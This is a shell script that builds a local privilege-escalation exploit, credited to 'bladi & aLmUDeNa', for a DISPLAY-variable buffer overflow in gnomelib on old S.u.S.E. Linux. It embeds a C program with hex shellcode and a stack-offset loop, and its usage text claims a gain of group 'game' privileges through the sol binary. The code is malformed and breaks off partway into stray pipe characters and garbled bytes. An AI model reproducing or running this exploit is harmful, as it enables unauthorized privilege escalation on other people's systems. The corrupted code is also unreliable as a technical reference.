#!/bin/sh
#
# Gnomelib exploit by bladi & aLmUDeNa
#
# All gnome apps have an exploitable buffer overflow
# (gnomelib) when get DISPLAY environment variable.
#
# Affected:
# S.u.S.E. Linux 6.4
# S.u.S.E. Linux 6.3
#
# Bueno un saludo a todos los que nos conocen/quieren/odian,
# bueno ya llevamos 6 meses y esperamos que dure mucho mas ;*
#
# bladi@euskalnet.net
# almudena@hempcultivation.com
cat > /tmp/6M.c < gnomelib.c <<_EOF_
#include
#include
#define NOP 0x90
#define RANFROM -1400
#define RANTO -300
int i,x;
char *ptr;
unsigned long *ptr2;
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/6M";
char buffer[164];
main(int argc, char *argv[])
{ long get_sp(void)
{
__asm__("movl %esp,%eax\n");
}
printf (" jpuff ver: 1.0 \n");
printf (" by \n");
printf (" bladi & aLmUDeNa\n\n");
if (argc < 2 )
{
printf(" Usage ./jpuff \n");
printf(" Try: ./jpuff /opt/gnome/bin/sol => you gain gid=40(game)\n");
exit(1);
}
for (x=RANFROM;x |
| |
|
| | | |
|
|
|
|
|
|
| |
ÑÇÖÞÅ·ÃÀÔÚÏß